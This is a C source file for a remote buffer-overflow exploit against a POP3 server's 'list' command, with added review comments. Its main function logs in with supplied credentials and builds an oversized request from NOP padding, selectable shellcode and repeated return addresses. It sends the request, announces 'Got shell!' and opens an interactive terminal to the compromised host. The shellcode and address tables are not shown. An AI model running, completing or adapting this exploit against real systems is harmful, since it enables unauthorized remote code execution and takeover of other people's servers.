/*-----------------------------------------------------------------------------
 Section: Function Definitions
 ----------------------------------------------------------------------------*/
/*
 * connect_start - pull the connection settings out of the ini store,
 * bring logging up, then open the server socket.
 *
 * The three ini_get_* calls fill the file-scope serverip, port and
 * logflag; their return values are intentionally discarded
 * (NOTE(review): presumably status codes - confirm against their
 * declarations).  log_init()/log_on(logflag) run before the socket is
 * created so the ordering of those side effects is preserved.
 *
 * Returns the value socket_init(serverip, port) hands back.
 */
static unsigned int
connect_start(void)
{
    /* configuration step: results land in file-scope variables */
    (void)ini_get_server_ip(serverip);
    (void)ini_get_server_port(&port);
    (void)ini_get_log_flag(&logflag);

    /* logging step: initialise, then apply the configured flag */
    (void)log_init();
    log_on(logflag);

    /* network step */
    unsigned int sock_handle = socket_init(serverip, port);
    return sock_handle;
}
/*
 * Program entry point.
 *
 * argv[1..3] are consumed positionally as the target host (kept in the
 * file-scope `victim`), a remote user name and a password; whatever follows
 * is parsed with getopt().  The option switch, the lookup/connect calls and
 * the buffer assembly all operate on file-scope state (buffer, bruteforce,
 * platforms, shellcodes, port, type, shellcode_num, offset, impact_place,
 * appenders, in, sock) whose definitions are outside this listing.
 *
 * Flow: option parsing -> do_lookup() -> do_connect()/receive()/log_on() ->
 * build one "list <n> " request padded with NOP bytes, the selected
 * shellcode and `appenders` copies of the platform return address ->
 * transmit() -> terminal().  usage() is presumably non-returning (it is
 * called on bad input with no return after it) - confirm its definition.
 * Bruteforce mode (-b) only reads and prints a range; nothing below iterates
 * over it.
 *
 * Returns 0, although the trailing comment says that point is not reached.
 */
int main(int argc, char **argv)
{
   int i, next_arg = 0;
   char *progname = argv[0];
   char *remote_user = NULL,
        *remote_passwd = NULL,
        *message_number = strdup("1");   /* default; never freed (short-lived process) */
   
   /* need at least <victim> <user> <password> */
   if (argc < 4)
      usage(progname);
      
   /* NOTE(review): sizeof((char *)&bruteforce) is the size of a pointer, not
      of the struct, so only the first pointer-sized bytes are zeroed here.
      bruteforce is not declared in this function, so it presumably has static
      storage and is zero-initialised anyway, which makes the short memset
      harmless in practice - confirm. */
   memset ((char *)&bruteforce, '\0', sizeof((char *)&bruteforce));
   
   /* Consume the three positional arguments; shifting argv/argc lets getopt()
      start at the first option.  The strdup() results live for the whole
      process and are never freed. */
   victim = (char *)strdup(argv[1]);
   argv++;
   argc--;

   remote_user = (char *)strdup(argv[1]);
   argv++;
   argc--;

   remote_passwd = (char *)strdup(argv[1]);
   argv++;
   argc--;
      
   /* Option string: p,t,s,o,r,i take an argument, b does not.  'm' is not in
      the string, so the `case 'm'` below is never selected by getopt() and
      -m falls into `default`.  getopt() returns -1 at the end; comparing
      against EOF only works where EOF == -1 (common, not guaranteed).
      atoi() is used on every option value with no error detection
      (strtol() would report non-numeric input). */
   while ( (next_arg = getopt(argc, argv, "p:t:s:o:r:i:b")) != EOF)
      switch (next_arg)
      {
         case 'p':
            /* the message says "above zero" but 0 is accepted */
            if ( (atoi(optarg) < 0) || (atoi(optarg) > 65535) )
            {
               fprintf (stderr, "Outrageous port-number! Stick with a number below 65535 (and above zero)\n");
               usage (progname);
            }
            port = atoi(optarg);
            printf (" -> Port set to %d.\n", port);
            break;
         case 't':
            /* range check is inclusive of MAX_TYPE; whether that is the last
               valid index of platforms[] or its element count is not visible
               here - confirm against the table definition */
            if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_TYPE) )
            {
               fprintf (stderr, "Invalid type, should range from 0 to %d.\n", MAX_TYPE);
               usage (progname);
            }
            type = atoi(optarg);
            printf (" -> Type set to %d, %s %s.\n", type, platforms[type].platform, platforms[type].tested_on);
            break;
         case 's':
            /* same inclusive check against MAX_SHELLCODE for shellcodes[] */
            if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_SHELLCODE) )
            {
               fprintf (stderr, "Invalid shellcode number, should range from 0 to %d.\n", MAX_SHELLCODE);
               usage (progname);
            }
            shellcode_num = atoi(optarg);
            printf (" -> Shellcode set for %s, %s.\n", shellcodes[shellcode_num].platform, shellcodes[shellcode_num].function);
            break;
         case 'o':
            /* -o after -b is rejected; -b after -o is not (case 'b' has no
               matching check) */
            if (bruteforce.on == 1)
            {
               fprintf (stderr, "You cannot specify -offset and -bruteforce at the same time.\nMake up your mind!\n");
               exit (-1);
            }
            offset = atoi(optarg);
            printf (" -> Offset set to %d.\n", offset);
            break;
         case 'b':
            bruteforce.on = 1;
            printf (" -> Bruteforce mode selected (not fully implemented in this version)\n");
            printf (" -> Enter offsets seperated with a space, and a 'step' number (e.g. \"bfffffff bffff000 4\"):\n   ");
            /* reads the range interactively from stdin; "%x %x %d" requires
               start/end to be unsigned int and step to be int - confirm the
               struct's field types */
            if ( (fscanf (stdin, "%x %x %d", &bruteforce.start, &bruteforce.end, &bruteforce.step)) != 3)
            {
               fprintf (stderr, "Unknown offsets.\n");
               exit (-1);
            }
            break;
         case 'i':
            /* no range check; impact_place is used as a buffer offset below */
            impact_place = atoi(optarg);
            printf (" -> Place of impact set to %d.\n", impact_place);
            break;
         case 'r':
            appenders = atoi(optarg);
            printf (" -> Number of return addresses set to %d.\n", appenders);
            break;
         case 'm':
            /* unreachable with the current getopt() string (no 'm'); would
               also leak the strdup("1") default */
            message_number = strdup(optarg);
            printf ("-> Message number set to \"%.10s\".\n", message_number);
            break;
         default:
            fprintf (stderr, "Fictional option: '%c', please take your medication.\n", next_arg);
            usage (progname);
            break;
      }

   /* presumably resolves `victim` into the file-scope `in` that is printed
      below via inet_ntoa() - confirm */
   do_lookup();

   printf ("\nAttacking %s, a %s %s host\n", victim, platforms[type].platform, platforms[type].tested_on);
   
   /* -1 is treated as "not given"; shellcode_num's initial value is outside
      this listing */
   if (shellcode_num != -1)
   {
      platforms[type].shellcode = &(shellcodes[shellcode_num]);
      printf (" - Using %s shellcode\n", shellcodes[shellcode_num].platform);
   } else
      printf (" - Using the default shellcode, %s\n", platforms[type].shellcode->platform);

   if (bruteforce.on == 0)
   {
      /* single-shot mode: adjust the table's return address by -o */
      platforms[type].address -= offset;
      printf (" - Using return address %#x\n", platforms[type].address);
      printf ("\nAssembling shellspawning code\n");
   } else
      /* the range is only printed; no loop over it follows */
      printf (" - Going to bruteforce from %#x to %#x in steps of %d\n", bruteforce.start, bruteforce.end, bruteforce.step);

   printf ("-> Connecting to %s, port %d\n", inet_ntoa(in), port);
   
   do_connect();
   receive ();
   /* authenticates with the positional credentials over `sock`
      (presumably the USER/PASS exchange - confirm in log_on) */
   log_on (remote_user, remote_passwd, sock);

   /* The request: "list <n> " (argument capped at 10 chars by %.10s, so at
      most 16 bytes + NUL) followed by the payload.  The author's comment
      names pop_list.c as the code containing the bug. */
   memset (buffer, '\0', sizeof(buffer));
   sprintf (buffer, "list %.10s ", message_number); //the bug lies in pop_list.c
   /* I do the '%s' to allow the possibility to enter '0001', in order
      a non-working length of <nops>+<shellcode>+<ret>... (theoretically ;) */
      

#ifdef DEBUG
   /* sizeof/strlen yield size_t; %d is the wrong specifier (%zu), undefined
      where size_t is wider than int - same for the Step 2/3 and HARDCORE
      prints */
   printf ("Step 1, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif

   /* fill everything after the request with NOP; the length leaves the last
      byte (still '\0' from the memset above) untouched so buffer remains a
      valid C string */
   memset (buffer+strlen(buffer), NOP, sizeof(buffer)-strlen(buffer)-1);

#ifdef DEBUG
   printf ("Step 2, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif

   /* Place the shellcode so that it ends at impact_place.  The destination
      buffer + impact_place - strlen(code) is not validated against the
      buffer bounds; impact_place is trusted as given by -i.  strncpy()
      zero-pads up to its length argument when the source is shorter, which
      is what re-terminates the string right after the shellcode for the
      strlen()-relative appends below.  The meaning of the literal 5 in the
      length is not visible here. */
   strncpy (buffer + impact_place - strlen(platforms[type].shellcode->code), platforms[type].shellcode->code, 
      sizeof(buffer) - impact_place - 5 - 1);
   //impact_place + strlen(platforms[type].shellcode->code) - (APPEND_ADDRESSES * sizeof(platforms[type].address) + 2) - 1);

#ifdef DEBUG
   printf ("Step 3, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif

   i = 0;
   
   /* append `appenders` raw copies of the return address, each written at
      the current strlen(buffer).  memcpy() copies the in-memory (host order)
      representation; the hard-coded 4 assumes a 32-bit address field - the
      commented block below was the explicit byte-wise version. */
   while (i < appenders) 
   {
/*
      o      = buffer + strlen(buffer);
      *(o)   = (platforms[type].address & 0x000000ff);
      *(o+1) = (platforms[type].address & 0x0000ff00) >> 8;
      *(o+2) = (platforms[type].address & 0x00ff0000) >> 16;
      *(o+3) = (platforms[type].address & 0xff000000) >> 24;
      *(o+4) = '\0';
*/      

      memcpy ((char *)&buffer + strlen(buffer), &platforms[type].address, 4);
#ifdef HARDCORE
      printf ("-> sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
      i++;
   }

   /* terminate the request line; strcpy() supplies the trailing NUL */
   strcpy (buffer + strlen(buffer), "\x0d\x0a"); // \x00 gets appended automatically


#ifdef HARDCORE
   /* hex dump.  `i` is int and strlen() is size_t (mixed-sign comparison);
      buffer[i] is promoted from char, so bytes >= 0x80 print sign-extended
      unless buffer is unsigned char - confirm its declaration */
   printf ("Code is:\n\033[1;31m");
   for (i = 0; i < strlen(buffer); i++)
      printf ("%02x  ", buffer[i]);

   printf ("\033[0;37m\n");
#endif   
   
   transmit (buffer);
   receive ();
   /* printed unconditionally: receive() returning is taken as success */
   printf ("Got shell!\n");

 
   /* presumably an interactive relay on sock that does not return (see the
      "not reached" comment below) - confirm in terminal() */
   terminal (sock);

   close (sock);
 //not reached
   
   return (0);
}